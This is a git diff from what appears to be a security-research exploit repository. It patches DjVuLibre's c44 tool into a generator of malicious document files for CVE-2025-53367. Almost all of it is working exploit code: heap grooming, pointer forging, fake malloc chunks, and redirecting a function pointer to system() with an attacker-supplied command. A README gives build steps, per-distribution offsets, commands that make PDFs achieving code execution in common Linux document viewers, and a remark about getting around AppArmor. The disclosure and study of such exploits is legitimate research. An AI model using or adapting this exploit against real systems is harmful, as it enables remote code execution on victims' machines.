modify_prevruns(packer, lineno, offsetof_dcd_ptr_backup - 0x8, stop); ++ ++ // skip ++ write_stop(packer, lineno, stop); ++ ++ // Copy pointer back. ++ write_H_even(packer, 0x0, offset); ++ write_H_even(packer, 0x0, 0x0); ++ write_H_even(packer, 0x0, 0x0); ++ write_H_even(packer, 0x0, 0x0); ++ write_V0(packer); ++ write_V0(packer); ++ write_V0(packer); ++ write_H_odd(packer, 0x0, stop); // stop ++ lineno++; ++} ++ ++// This overwrites jimg->blits.data and also modifies the size field ++// immediately above it. This operation is a bit tricky because the ++// data field is immediately preceded by the traits field, which I ++// cannot overwrite. ++static void modify_jimg_blits(BitPacker &packer, size_t &lineno, ++ uint16_t field_offset, uint16_t dst, ++ uint16_t minlo, uint16_t maxhi, uint16_t lobound, ++ uint16_t hibound) { ++ modify_prevruns_relative(packer, lineno, distance_jimg_to_dcd - field_offset, ++ 0x40000); ++ ++ // Copy pointer to &prevruns to jimg->blits.data, but with zeros ++ // below it so that I can copy it back out and modify it. ++ write_H_even(packer, 0x0, 0x0); ++ write_V0(packer); ++ write_V0(packer); ++ write_V0(packer); ++ write_H_odd(packer, 0x0, 0x40000); // stop ++ lineno++; ++ ++ // Copy pointer back to dcd, where I can modify it. It is stored at ++ // &glineruns + 0x4. ++ write_H_even(packer, 0x0, 0x0); ++ write_V0(packer); ++ write_V0(packer); ++ write_V0(packer); ++ write_H_odd(packer, 0x0, 0x40000); // stop ++ lineno++; ++ ++ // skip line ++ write_stop(packer, lineno, 0x40000); ++ ++ // Overwrite bottom two bytes of the pointer. ++ write_VL1(packer); ++ write_H_odd(packer, 0x0, 0x40000 | dst); // stop ++ lineno++; ++ ++ // Copy pointer to jimg properly this time. ++ write_P(packer); ++ write_V0(packer); ++ write_V0(packer); ++ write_V0(packer); ++ ++ // Overwrite size fields ++ write_H_odd(packer, 0x0, minlo); // data{6,7}, minlo{0,1} ++ write_H_odd(packer, 0x0, maxhi); // minlo{2,3}, maxhi{0,1} ++ write_H_odd(packer, 0x0, lobound); // maxhi{2,3}, lobound{0,1} ++ write_H_odd(packer, 0x0, hibound); // lobound{2,3}, hibound{0,1} ++ write_H_odd(packer, 0x0, 0x0); // hibound{2,3}, reproduce_old_bug ++ ++ // Need to be precise with the stop condition because I haven't left ++ // a prefix that can be overwritten, so I can't let it rewind. So I ++ // need to add just enough to a0 that it will only just overflow ++ // past 0x30000. Luckily I know the exact uint16_t values that I've ++ // written to everything except data{2,3} and data{4,5}. And I also ++ // know that those two values are non-zero. ++ uint16_t knowntotal = dst + minlo + maxhi + lobound + hibound; ++ write_H_odd(packer, 0x0, 0x10000 - knowntotal); // stop ++ // Total value written so far is 0x10000 + data{2,3} + data{4,5}, so ++ // I know that: 0x10002 <= a0 <= 0x2fffe. Therefore, this will cause ++ // a stop that won't rewind: ++ write_H_odd(packer, 0xffff, 0xffff); // stop ++ lineno++; ++} ++ ++static void forge_pointer(BitPacker &packer, size_t &lineno, uint16_t p, ++ uint16_t target) { ++ modify_prevruns(packer, lineno, p - 4, 0x40000); ++ ++ write_H_even(packer, 0x0, 0x0); ++ write_V0(packer); ++ write_V0(packer); ++ write_V0(packer); ++ write_H_odd(packer, 0x0, 0x40000); // stop ++ lineno++; ++ ++ // skip line ++ write_stop(packer, lineno, 0x40000); ++ ++ // Overwrite bottom two bytes of the pointer. ++ write_VL1(packer); ++ write_H_odd(packer, 0x0, 0x40000 | target); // stop ++ lineno++; ++} ++ ++// This modifies fake_bitmap->gbytes_data, so that fake_bitmap will get ++// freed at the end of the pass. This also wipes bytes_data, but it ++// isn't used so that doesn't matter. ++static void prepare_fake_bitmap_for_reuse(BitPacker &packer, size_t &lineno) { ++ uint16_t p = offsetof_fake_bitmap + offsetof_bytes_data; ++ modify_prevruns(packer, lineno, p, 0x40000); ++ write_VL1(packer); ++ write_H_odd(packer, 0x0, 0x0); ++ write_H_odd(packer, 0x0, 0x40000 | offsetof_fake_bytes_data); ++ lineno++; ++ ++ // Forge a pointer to fake_bitmap. ++ forge_pointer(packer, lineno, offsetof_fake_bytes_data, offsetof_fake_bitmap); ++} ++ ++// Zero final two bytes of grle and go all the way to the first two ++// bytes of grlerows. grlerows should point at offsetof_fake_rlerows. ++static void prepare_fake_bitmap_grlerows(BitPacker &packer, size_t &lineno) { ++ uint16_t p = offsetof_fake_bitmap + offsetof_rle; ++ ++ modify_prevruns(packer, lineno, p + 14, 0x40000); ++ for (p = offsetof_grle + 0x6; p < offsetof_grlerows - 2; p += 4) { ++ write_H_even(packer, 0x0, 0x0); ++ } ++ write_H_even(packer, 0x0, 0x40000 | offsetof_fake_rlerows); // stop ++ lineno++; ++} ++ ++// This prepares the fake bitmap so that this memcpy will get ++// called: ++// ++// https://sourceforge.net/p/djvu/djvulibre-git/ci/42029c33b2fb25bc1fa98c80b2be83a2fa23cce1/tree/libdjvu/GBitmap.cpp#l1236 ++// ++// The source pointer for the memcpy needs to be copied to rle after ++// this function finishes. dst is the destination of the memcpy. dst ++// needs to point to a fake chunk, which will get freed and then ++// immediately reallocated. size is the number of bytes that will be ++// memcpy'd, which must match the size of the fake chunk at dst. ++static void prepare_fake_bitmap_for_memcpy(BitPacker &packer, size_t &lineno, ++ uint16_t dst, uint16_t size) { ++ // Forge a pointer to dst in fake_rlerows. ++ forge_pointer(packer, lineno, offsetof_fake_rlerows, dst); ++ ++ // Modify rlelength ++ modify_prevruns(packer, lineno, offsetof_fake_bitmap + offsetof_rlelength - 4, ++ 0x40000); ++ write_H_even(packer, 0x0, 0x0); ++ write_H_even(packer, size, 0x40000); // stop ++ lineno++; ++} ++ ++// Helper for create_fake_chunks(). ++static void create_fake_chunk_body(BitPacker &packer, size_t &lineno, ++ uint16_t &offset, uint16_t size) { ++ const uint16_t end = offset + size + 0x10; ++ write_H_even(packer, size + 0x15, 0x0); ++ offset += 4; ++ while (offset < end) { ++ write_H_even(packer, 0x0, 0x0); ++ offset += 4; ++ } ++} ++ ++// Create some fake malloc chunks at the specified offset. ++static void create_fake_chunks(BitPacker &packer, size_t &lineno, ++ uint16_t offset, ++ const std::vector &sizes, ++ uint32_t stop) { ++ // Reverse an extra 4 bytes because they'll get zeroed at the end of the line. ++ offset -= 0xc; ++ modify_prevruns(packer, lineno, offset, stop); ++ ++ write_H_even(packer, 0x0, 0x0); ++ offset += 4; ++ ++ // create n chunks. ++ size_t n = sizes.size(); ++ for (size_t i = 0; i < n; i++) { ++ create_fake_chunk_body(packer, lineno, offset, sizes[i]); ++ } ++ create_fake_chunk_body(packer, lineno, offset, 0x10); ++ write_H_even(packer, 0x25, stop); // stop ++ lineno++; ++} ++ ++// Write the shell command string. ++static void write_command(BitPacker &packer, size_t &lineno, uint16_t dst, ++ const char *cmd) { ++ // Sum the uint16_t values so that I can set the width to the correct value. ++ size_t n = strlen(cmd); ++ uint32_t total = 0; ++ ++ for (size_t i = 0; i < n; i += 4) { ++ uint16_t p[2] = {0, 0}; ++ memcpy(p, &cmd[i], std::min(sizeof(p), n - i)); ++ total += p[0] + p[1]; ++ } ++ ++ // Add 1 to the total to use as a stop value. ++ total++; ++ ++ // Need to modify width manually because it needs a bigger ++ // stop value than usual. ++ uint32_t stop = ((total >> 16) + 2) << 16; ++ // Point prevruns at dcd. ++ modify_prevruns_relative(packer, lineno, 0, 0x40000); ++ for (size_t i = 0; i < offsetof_dcd_width; i += 4) { ++ write_H_even(packer, 0, 0); ++ } ++ write_H_even(packer, total & 0xffff, stop | (total >> 16)); ++ lineno++; ++ ++ modify_prevruns(packer, lineno, dst, stop); ++ for (size_t i = 0; i < n; i += 4) { ++ uint16_t p[2] = {0, 0}; ++ memcpy(p, &cmd[i], std::min(sizeof(p), n - i)); ++ write_H_even(packer, p[0], p[1]); ++ } ++ ++ write_H_even(packer, 0, 1); // stop ++ lineno++; ++ ++ // reset width ++ modify_prevruns_relative(packer, lineno, 0, stop); ++ for (size_t i = 0; i < offsetof_dcd_width; i += 4) { ++ write_H_even(packer, 0, 0); ++ } ++ write_H_even(packer, 0x0, stop | 0x3); ++ lineno++; ++} ++ ++static void chunk_Smmr(IFFByteStream &iff, ++ const uint16_t distance_traits_to_strtol, ++ const uint16_t distance_strtol_to_system, ++ const char *command) { ++ iff.put_chunk("Smmr"); ++ uint8_t magic[4] = {'M', 'M', 'R', '\0'}; ++ iff.get_bytestream()->write(magic, sizeof(magic)); ++ ++ // This choice of width will allocate a chunk of size 0x220, which is ++ // waiting in the tcache thanks to the feng shui phase which just ++ // happened. It means that dcd->lineruns will get allocated immediately ++ // below dcd in memory, so I can use the buffer overflow to corrupt dcd. ++ const uint16_t width = (0x10 * 0x21) / 2; ++ ++ // `height` is the number of lines. It needs to be bigger than the number ++ // of steps in the exploit. For example, it gets decremented every time ++ // write_stop is called. It is also used in the calculation of ++ // `blocksize`. ++ const uint16_t height = 100 * 22; ++ const uint16_t blocksize = ++ std::min(500, std::max(64, std::max(width / 17, height / 22))); ++ const uint16_t blocksperline = (width + blocksize - 1) / blocksize; ++ ++ iff.get_bytestream()->write16(width); // width ++ iff.get_bytestream()->write16(height); // height ++ ++ uint8_t bitbuf[0x20000]; ++ BitPacker packer(bitbuf, sizeof(bitbuf)); ++ size_t lineno = 0; ++ uint16_t p = 0; ++ ++ // Pass 0 ++ lineno = 0; ++ ++ // skip ++ firstrun(packer, lineno, width, blocksize, blocksperline); ++ ++ overwrite_width(packer, 0x0); ++ write_stop(packer, lineno, 0x40000); ++ ++ create_write_what_where_gadget(packer, lineno); ++ ++ // Clean the memory in the scratch area. ++ wipe_bytes_at_dst(packer, lineno, offsetof_scratch_area, ++ offsetof_scratch_area_end - offsetof_scratch_area, 0x40000); ++ ++ make_backup_ptr(packer, lineno); ++ ++ // Copy arena pointer components. ++ copy_uint16(packer, lineno, offsetof_dcd_ptr_backup + 2, arena_ptrbytes_2_3); ++ copy_uint16(packer, lineno, offsetof_dcd_ptr_backup + 4, arena_ptrbytes_4_5); ++ ++ // The backup pointer got trashed by copy_uint16, so build it again. ++ make_backup_ptr(packer, lineno); ++ ++ std::vector fake_chunk_sizes = {sizeof_GBitmap, sizeof_fake_chunk, ++ sizeof_fake_chunk}; ++ create_fake_chunks(packer, lineno, offsetof_fake_bitmap, fake_chunk_sizes, ++ 0x40000); ++ ++ // Overwrite jimg->blits.data and tinker with its size fields so ++ // that it will get reallocated at the end of this pass. I'll use it ++ // to free fake_bitmap so that it will get allocated on the next ++ // pass. ++ modify_jimg_blits(packer, lineno, offsetof_blits_data, offsetof_fake_bitmap, ++ 0, 4, 0, 4); ++ ++ // Point prevruns somewhere safe. ++ modify_prevruns(packer, lineno, offsetof_scratch_area, 0x40000); ++ ++ // padding to finish the pass ++ while (lineno < blocksize) { ++ write_stop(packer, lineno, 0x30000 | lineno); ++ } ++ ++ // Pass 1 ++ lineno = 0; ++ ++ // skip ++ write_stop(packer, lineno, 0x30002); ++ ++ prepare_fake_bitmap_for_reuse(packer, lineno); ++ ++ prepare_fake_bitmap_grlerows(packer, lineno); ++ ++ prepare_fake_bitmap_for_memcpy(packer, lineno, offsetof_fake_chunk1, ++ sizeof_fake_chunk); ++ ++ // Write a pointer to jimg to fake_bitmap->rle, so that the memcpy will ++ // copy the contents of jimg to fake_chunk, where it's easier to work with ++ // because it's at a fixed offset. ++ modify_prevruns(packer, lineno, offsetof_fake_bitmap + offsetof_rle - 4, ++ 0x40000); ++ ++ // Calculate the address of jimg relative to the address stored in ++ // dcd.prevruns. ++ write_H_even(packer, 0x0, ++ distance_jimg_to_dcd + offsetof_dcd_prevruns - 0x10); ++ write_V0(packer); ++ write_V0(packer); ++ write_V0(packer); ++ // Overwrite bottom bytes of grle so that it points at fake_bitmap->bytes. ++ write_H_odd(packer, 0x40000, offsetof_fake_bitmap + offsetof_bytes); // stop ++ lineno++; ++ ++ // Point prevruns somewhere safe. ++ modify_prevruns(packer, lineno, offsetof_scratch_area, 0x40000); ++ ++ // padding to finish the pass ++ while (lineno < blocksize) { ++ write_stop(packer, lineno, 0x30000 | lineno); ++ } ++ ++ // Pass 2 ++ lineno = 0; ++ ++ // skip ++ write_stop(packer, lineno, 0x30002); ++ ++ // Split the traits pointer into separate components, because I ++ // need to use it twice and it'll get trashed if I use pointer_add ++ // on it directly. ++ p = offsetof_fake_chunk1 + offsetof_blits_traits; ++ copy_uint16(packer, lineno, p + 0, traits_ptrbytes_0_1); ++ copy_uint16(packer, lineno, p + 2, traits_ptrbytes_2_3); ++ copy_uint16(packer, lineno, p + 4, traits_ptrbytes_4_5); ++ ++ // Restore the traits pointer in its original location. ++ copy_uint16(packer, lineno, traits_ptrbytes_0_1, p + 0); ++ copy_uint16(packer, lineno, traits_ptrbytes_2_3, p + 2); ++ copy_uint16(packer, lineno, traits_ptrbytes_4_5, p + 4); ++ ++ prepare_fake_bitmap_for_reuse(packer, lineno); ++ ++ prepare_fake_bitmap_grlerows(packer, lineno); ++ ++ prepare_fake_bitmap_for_memcpy(packer, lineno, offsetof_fake_chunk2, ++ sizeof_fake_chunk); ++ ++ // Reconstruct the traits pointer in fake_bitmap->rle. ++ p = offsetof_fake_bitmap + offsetof_rle; ++ copy_uint16(packer, lineno, traits_ptrbytes_0_1, p + 0); ++ copy_uint16(packer, lineno, traits_ptrbytes_2_3, p + 2); ++ copy_uint16(packer, lineno, traits_ptrbytes_4_5, p + 4); ++ ++ // Reconstruct grle ++ p = offsetof_fake_bitmap + offsetof_grle; ++ modify_prevruns(packer, lineno, p - 2, 0x40000); ++ write_H_even(packer, 0x0, offsetof_fake_bitmap + offsetof_bytes); ++ write_H_even(packer, 0xffff - offsetof_fake_bitmap + offsetof_bytes, 0xaaab); ++ write_H_even(packer, 0xaaab, 0xaaab); ++ lineno++; ++ ++ copy_uint16(packer, lineno, arena_ptrbytes_2_3, p + 2); ++ copy_uint16(packer, lineno, arena_ptrbytes_4_5, p + 4); ++ ++ modify_prevruns(packer, lineno, p + 6, 0x40000); ++ write_stop(packer, lineno, 0x40000); ++ ++ // Point prevruns somewhere safe. ++ modify_prevruns(packer, lineno, offsetof_scratch_area, 0x40000); ++ ++ // padding to finish the pass ++ while (lineno < blocksize) { ++ write_stop(packer, lineno, 0x30000 | lineno); ++ } ++ ++ // Pass 3 ++ lineno = 0; ++ ++ // skip ++ write_stop(packer, lineno, 0x30002); ++ ++ prepare_fake_bitmap_for_reuse(packer, lineno); ++ ++ prepare_fake_bitmap_grlerows(packer, lineno); ++ ++ // fake chunk 1 currently contains a copy of jimg, which I don't ++ // need anymore after this pass, so it can be used as the memcpy ++ // destination. ++ prepare_fake_bitmap_for_memcpy(packer, lineno, offsetof_fake_chunk1, ++ sizeof_fake_chunk); ++ ++ pointer_add(packer, lineno, offsetof_fake_chunk1 + offsetof_blits_traits, ++ offsetof_fake_bitmap + offsetof_rle, ++ distance_traits_to_strtol - 0x10); ++ ++ // Reconstruct grle ++ p = offsetof_fake_bitmap + offsetof_grle; ++ modify_prevruns(packer, lineno, p - 2, 0x40000); ++ write_H_even(packer, 0x0, offsetof_fake_bitmap + offsetof_bytes); ++ write_H_even(packer, 0xffff - offsetof_fake_bitmap + offsetof_bytes, 0xaaab); ++ write_H_even(packer, 0xaaab, 0xaaab); ++ lineno++; ++ ++ copy_uint16(packer, lineno, arena_ptrbytes_2_3, p + 2); ++ copy_uint16(packer, lineno, arena_ptrbytes_4_5, p + 4); ++ ++ modify_prevruns(packer, lineno, p + 6, 0x40000); ++ write_stop(packer, lineno, 0x40000); ++ ++ // Point prevruns somewhere safe. ++ modify_prevruns(packer, lineno, offsetof_scratch_area, 0x40000); ++ ++ // padding to finish the pass ++ while (lineno < blocksize) { ++ write_stop(packer, lineno, 0x30000 | lineno); ++ } ++ ++ // Pass 4 ++ lineno = 0; ++ ++ // skip ++ write_stop(packer, lineno, 0x30002); ++ ++ // Build a fake traits. I've already memcpy'd the traits to the ++ // fake_chunk2, so I just need to overwrite the fini field with ++ // a pointer to system. ++ uint16_t faketraits = offsetof_fake_chunk2; ++ ++ // A pointer to __GI___isoc23_strtol is currently stored at fake_chunk1 + ++ // 0x10. Add an offset to get the address of system and write it into the fini ++ // field of the fake traits. ++ pointer_add(packer, lineno, offsetof_fake_chunk1 + 0x10, faketraits + 0x20, ++ distance_strtol_to_system); ++ ++ // zero top two bytes of the pointer ++ modify_prevruns(packer, lineno, faketraits + 0x26, 0x40000); ++ write_stop(packer, lineno, 0x40000); ++ ++ write_command(packer, lineno, offsetof_command, command); ++ ++ modify_jimg_blits(packer, lineno, offsetof_blits_traits, faketraits, 0, 0, 0, ++ 0); ++ ++ // Point jimg->blits.data at the command string and modify the size ++ // fields so that jimg->blits.traits->fini() will get called on it. ++ modify_jimg_blits(packer, lineno, offsetof_blits_data, offsetof_command, 0, 0, ++ 2, 0); ++ ++ // Point prevruns somewhere safe. ++ modify_prevruns(packer, lineno, offsetof_scratch_area, 0x40000); ++ ++ // padding to finish the pass ++ while (lineno < blocksize) { ++ write_stop(packer, lineno, 0x30000 | lineno); ++ } ++ ++ iff.get_bytestream()->write(bitbuf, packer.byteoffset()); ++ ++ iff.close_chunk(); ++} ++ ++// Make a comment string of a specific length by repeating the message. ++std::string mkcomment(const char *msg, size_t size) { ++ const size_t msglen = strlen(msg); ++ std::string s; ++ s.reserve(size); ++ while (s.size() + msglen <= size) { ++ s += msg; ++ } ++ while (s.size() + 1 <= size) { ++ s += '\n'; ++ } ++ return s; ++} ++ ++static void create_photo_djvu_file(IFFByteStream &iff, ++ const uint16_t distance_traits_to_strtol, ++ const uint16_t distance_strtol_to_system, ++ const char *command) { + // Prepare info chunk +- GP ginfo=DjVuInfo::create(); +- DjVuInfo &info=*ginfo; +- info.width = w; +- info.height = h; +- info.dpi = (flag_dpi>0 ? flag_dpi : 100); +- info.gamma = (flag_gamma>0 ? flag_gamma : 2.2); ++ GP ginfo = DjVuInfo::create(); ++ DjVuInfo &info = *ginfo; ++ info.width = 200; ++ info.height = 200; ++ info.dpi = 100; ++ info.gamma = 2.2; + // Write djvu header and info chunk + iff.put_chunk("FORM:DJVU", 1); + iff.put_chunk("INFO"); + info.encode(*iff.get_bytestream()); ++ { ++ char txt[4096]; ++ memset(txt, 0, sizeof(txt)); ++ strcpy(txt, "kevwozere"); ++ iff.get_bytestream()->write(txt, sizeof(txt)); ++ } + iff.close_chunk(); +- // Write all chunks +- int flag = 1; +- for (int i=0; flag && i gd = JB2Dict::create(); ++ JB2Dict &d = *gd; ++ std::vector comments; ++ size_t comment_idx = 0; ++ d.encode_shape_cb = [&d, &comments, &comment_idx]() { ++ std::string& c = comments[comment_idx++]; ++ d.comment = c.c_str(); ++ }; ++ ++ for (size_t i = 0; i < 0x9; i++) { ++ for (size_t j = 0xb; j > 1; j--) { ++ comments.push_back(""); ++ // Total size will be 16*j-4, so it will allocate ++ // a chunk of size 16*(j+1). ++ djbz_bitmap(d, 3, 1008, (j*0x10 - 0x17)/3 + 1); ++ } ++ } ++ ++ for (size_t i = 0; i < 2; i++) { ++ comments.push_back(""); ++ djbz_bitmap(d, 3, 1008, 0xae); // 0x220 tcache chunk ++ } ++ ++ // The portcaster is a nuisance because it allocates a bunch of ++ // small chunks. The exact amount of memory that it allocates ++ // seems to be non-deterministic, so it could ruin all my ++ // work. Luckily the timing of when it runs is completely ++ // deterministic: it gets triggered every 256 bytes. It gets ++ // called several times during the decoding of the large comment ++ // below, but I have tuned things so that it won't get called ++ // again before the end of this Djbz segment. ++ ++ // The purpose of this large comment is to create a hole in memory ++ // where jimg, prevruns, lineruns, and dcd will get allocated. I ++ // allocate this comment, then plug any other holes in memory ++ // before freeing it so that it will get used for those ++ // allocations. ++ comments.push_back(mkcomment("kevwozere101\n", 0xbdf)); ++ djbz_bitmap(d, 3, 0xff00, 0x2a); ++ ++ // Plug holes. Use a very large bitmap that compresses to a small ++ // size so that the temporary mallocs that happen during parsing ++ // get mmapped and won't interfere with the thread-local arena. ++ for (size_t i = 0; i < 0x10; i++) { ++ comments.push_back(""); ++ djbz_bitmap(d, 3, 0xff00, 0x2a); ++ comments.push_back(""); ++ djbz_bitmap(d, 3, 0xff00, 1); + } ++ ++ comments.push_back(mkcomment("\n", 0x98)); // jimg ++ djbz_bitmap(d, 3, 0xff00, 1); ++ ++ comments.push_back(mkcomment("\n", 0x208)); // prevruns, lineruns ++ djbz_bitmap(d, 3, 0xff00, 1); ++ ++ comments.push_back(mkcomment("\n", 0x78)); ++ djbz_bitmap(d, 3, 0xff00, 1); ++ ++ comments.push_back(mkcomment("kevwozere102\n", 0x17)); ++ ++ d.encode(iff.get_bytestream()); ++ } ++ iff.close_chunk(); ++ ++ chunk_Smmr(iff, distance_traits_to_strtol, distance_strtol_to_system, ++ command); ++ + // Close djvu chunk + iff.close_chunk(); + } + ++// parse an offset like 0x1010 ++uint16_t parse_offset(const char *arg) { ++ unsigned long n; ++ if (strncmp(arg, "0x", 2) == 0) { ++ // hex ++ n = strtoul(arg + 2, 0, 16); ++ } else { ++ // dec ++ n = strtoul(arg, 0, 10); ++ } ++ if (n >= 0x10000) { ++ G_THROW(ERR_MSG("offset is too big for a uint16_t")); ++ } ++ return n; ++} + +-int +-main(int argc, char **argv) +-{ ++int main(int argc, char **argv) { + DJVU_LOCALE; +- GArray dargv(0,argc-1); +- for(int i=0;i gibs=ByteStream::create(g().pnmurl,"rb"); +- ByteStream &ibs=*gibs; +- char prefix[16]; +- memset(prefix, 0, sizeof(prefix)); +- if (ibs.readall((void*)prefix, sizeof(prefix)) < sizeof(prefix)) +- G_THROW( ERR_MSG("c44.failed_pnm_header") ); +-#ifdef DEFAULT_JPEG_TO_HALF_SIZE +- // Default specification for jpeg files +- // This is disabled because +- // -1- jpeg detection is unreliable. +- // -2- quality is very difficult to predict. +- if(prefix[0]!='P' &&prefix[0]!='A' && prefix[0]!='F' && +- !flag_mask && !flag_bpp && !flag_size && +- !flag_slice && !flag_decibel) +- { +- parse_size("10,20,30,50"); +- flag_size = flag_percent = 1; +- } +-#endif +- // Change percent specification into size specification +- if (flag_size && flag_percent) +- for (int i=0; isize())/ 100; +- flag_percent = 0; +- // Load images +- int w = 0; +- int h = 0; +- ibs.seek(0); +- GP iw; +- // Check color vs gray +- if (prefix[0]=='P' && (prefix[1]=='2' || prefix[1]=='5')) +- { +- // gray file +- GP gibm=GBitmap::create(ibs); +- GBitmap &ibm=*gibm; +- w = ibm.columns(); +- h = ibm.rows(); +- iw = IW44Image::create_encode(ibm, getmask(w,h)); +- } +- else if (!GStringRep::cmp(prefix,"AT&TFORM",8) || +- !GStringRep::cmp(prefix,"FORM",4)) +- { +- char *s = (prefix[0]=='F' ? prefix+8 : prefix+12); +- GP giff=IFFByteStream::create(gibs); +- IFFByteStream &iff=*giff; +- const bool color=!GStringRep::cmp(s,"PM44",4); +- if (color || !GStringRep::cmp(s,"BM44",4)) +- { +- iw = IW44Image::create_encode(IW44Image::COLOR); +- iw->decode_iff(iff); +- w = iw->get_width(); +- h = iw->get_height(); +- } +- else +- G_THROW( ERR_MSG("c44.unrecognized") ); +- // Check that no mask has been specified. +- if (! g().mskurl.is_empty()) +- G_THROW( ERR_MSG("c44.failed_mask") ); +- } +- else // just for kicks, try jpeg. +- { +- // color file +- const GP gipm(GPixmap::create(ibs)); +- GPixmap &ipm=*gipm; +- w = ipm.columns(); +- h = ipm.rows(); +- iw = IW44Image::create_encode(ipm, getmask(w,h), arg_crcbmode); +- } +- // Call destructor on input file +- gibs=0; +- +- // Perform compression PM44 or BM44 as required +- if (iw) +- { +- g().iw4url.deletefile(); +- GP iff = +- IFFByteStream::create(ByteStream::create(g().iw4url,"wb")); +- if (flag_crcbdelay >= 0) +- iw->parm_crcbdelay(flag_crcbdelay); +- if (flag_dbfrac > 0) +- iw->parm_dbfrac((float)flag_dbfrac); +- int nchunk = resolve_quality(w*h); +- // Create djvu file +- create_photo_djvu_file(*iw, w, h, *iff, nchunk, g().parms); +- } +- } +- G_CATCH(ex) +- { +- ex.perror(); +- exit(1); ++ GArray dargv(0, argc - 1); ++ for (int i = 0; i < argc; ++i) ++ dargv[i] = GNativeString(argv[i]); ++ G_TRY { ++ if (argc != 5) { ++ G_THROW(ERR_MSG("usage: ")); + } ++ ++ // Distance from jimg->blits.traits to __GI___isoc23_strtol pointer ++ const uint16_t distance_traits_to_strtol = parse_offset(argv[1]); ++ ++ // Distance from &__GI___isoc23_strtol to &system ++ const uint16_t distance_strtol_to_system = parse_offset(argv[2]); ++ ++ GURL iw4url = GURL::Filename::UTF8(dargv[4]); ++ iw4url.deletefile(); ++ GP iff = ++ IFFByteStream::create(ByteStream::create(iw4url, "wb")); ++ // Create djvu file ++ create_photo_djvu_file(*iff, distance_traits_to_strtol, ++ distance_strtol_to_system, argv[3]); ++ } ++ G_CATCH(ex) { ++ ex.perror(); ++ exit(1); ++ } + G_ENDCATCH; + return 0; + } diff --git a/SecurityExploits/DjVuLibre/MMRDecoder_scanruns_CVE-2025-53367/README.md b/SecurityExploits/DjVuLibre/MMRDecoder_scanruns_CVE-2025-53367/README.md new file mode 100644 index 0000000..dcfdcf0 --- /dev/null +++ b/SecurityExploits/DjVuLibre/MMRDecoder_scanruns_CVE-2025-53367/README.md @@ -0,0 +1,62 @@ +# Proof of concept for DjVuLibre CVE-2025-53367 + +This poc uses CVE-2025-53367 to achieve code execution in the +default PDF viewer on many Linux distributions: +[evince](https://gitlab.gnome.org/GNOME/evince) or +[papers](https://gitlab.gnome.org/GNOME/papers). + +Because the DjVuLibre file format is quite complicated, it was +easiest to create the poc by reusing the DjVuLibre codebase, +and modifying one of its tools to generate the poc file. So to +build the poc, you need to clone the official DjVuLibre repo +and then apply a patch: + +```bash +git clone https://git.code.sf.net/p/djvu/djvulibre-git DjVuLibre-poc-CVE-2025-53367 +cd DjVuLibre-poc-CVE-2025-53367 +git checkout 4a285e8da5cd9a2a6b296242a952ee96e519280d +git apply ../DjVuLibre-poc-CVE-2025-53367.diff +``` + +Build it like this: + +```bash +./autogen.sh --prefix=`pwd`/install +make install +``` + +Now generate the poc file like this: + +```bash +./install/bin/c44 0x1010 0x4770 "google-chrome https://www.youtube.com/watch?v=dQw4w9WgXcQ" plucky.pdf # Ubuntu 25.04 +./install/bin/c44 0x1010 0x4360 "google-chrome https://www.youtube.com/watch?v=dQw4w9WgXcQ" noble.pdf # Ubuntu 24.04 +``` + +The first two parameters are offsets that need to be tuned for +different Linux distributions. The first is the distance between two +pointers in `libdjvulibre.so` and the second is the distance between +two pointers in `libc.so`. The third parameter is the command string +that will be passed to `system()`. Note that evince/papers run under +an [AppArmor](https://apparmor.net/) profile which will block some +commands. It's not super-restrictive, so there are ways of getting +past it. You can use the `aa-exec` tool to experiment with what's +possible: + +```bash +aa-exec -d -v -p /usr/bin/papers /bin/bash -c "echo 1337 > ~/pwned.txt" +``` + +## Original fuzzer-generated poc + +We published this (much simpler) version of the poc sooner, to help +people quickly test whether they're running a vulnerable version of +DjVuLibre. This poc only causes the DjVuLibre library to crash. + +[Fuzzer-generated poc file](./fuzzer-poc.djvu) + +## Links: + +* https://github.blog/security/vulnerability-research/cve-2025-53367-an-exploitable-out-of-bounds-write-in-djvulibre/ +* https://www.openwall.com/lists/oss-security/2025/07/03/1 +* https://securitylab.github.com/advisories/GHSL-2025-055_DjVuLibre/ +* https://github.com/kevinbackhouse/DjVuLibre-poc-CVE-2025-53367 (this same poc in a standalone git repo) diff --git a/SecurityExploits/DjVuLibre/MMRDecoder_scanruns_CVE-2025-53367/fuzzer-poc.djvu b/SecurityExploits/DjVuLibre/MMRDecoder_scanruns_CVE-2025-53367/fuzzer-poc.djvu new file mode 100644 index 0000000..e4b6b16 Binary files /dev/null and b/SecurityExploits/DjVuLibre/MMRDecoder_scanruns_CVE-2025-53367/fuzzer-poc.djvu differ diff --git a/SecurityExploits/DjVuLibre/MMRDecoder_scanruns_CVE-2025-53367/noble.pdf b/SecurityExploits/DjVuLibre/MMRDecoder_scanruns_CVE-2025-53367/noble.pdf new file mode 100644 index 0000000..37c9f5f Binary files /dev/null and b/SecurityExploits/DjVuLibre/MMRDecoder_scanruns_CVE-2025-53367/noble.pdf differ diff --git a/SecurityExploits/DjVuLibre/MMRDecoder_scanruns_CVE-2025-53367/plucky.pdf b/SecurityExploits/DjVuLibre/MMRDecoder_scanruns_CVE-2025-53367/plucky.pdf new file mode 100644 index 0000000..3cdfd1e Binary files /dev/null and b/SecurityExploits/DjVuLibre/MMRDecoder_scanruns_CVE-2025-53367/plucky.pdf differ diff --git a/SecurityExploits/SANE/epsonds_CVE-2020-12861/sane_backends_exploit.cpp b/SecurityExploits/SANE/epsonds_CVE-2020-12861/sane_backends_exploit.cpp index 1a36262..e5fbbcb 100644 --- a/SecurityExploits/SANE/epsonds_CVE-2020-12861/sane_backends_exploit.cpp +++ b/SecurityExploits/SANE/epsonds_CVE-2020-12861/sane_backends_exploit.cpp @@ -3,6 +3,9 @@ #include #include #include "utils.hpp" +#include +#include +#include // This number is the buffer size that we use in the "large_mmap" stage. // The exact value doesn't matter too much: it just needs to be more than diff --git a/SecurityExploits/Ubuntu/accountsservice_CVE-2021-3939/DBusParse b/SecurityExploits/Ubuntu/accountsservice_CVE-2021-3939/DBusParse index b2c75ca..8d73dbe 160000 --- a/SecurityExploits/Ubuntu/accountsservice_CVE-2021-3939/DBusParse +++ b/SecurityExploits/Ubuntu/accountsservice_CVE-2021-3939/DBusParse @@ -1 +1 @@ -Subproject commit b2c75caace13d54303581a71f72c83bb5239b3a2 +Subproject commit 8d73dbeafd857207bfd76b10ec74b5cc382e1975 diff --git a/SecurityExploits/Ubuntu/accountsservice_CVE-2021-3939/EPollLoop b/SecurityExploits/Ubuntu/accountsservice_CVE-2021-3939/EPollLoop index 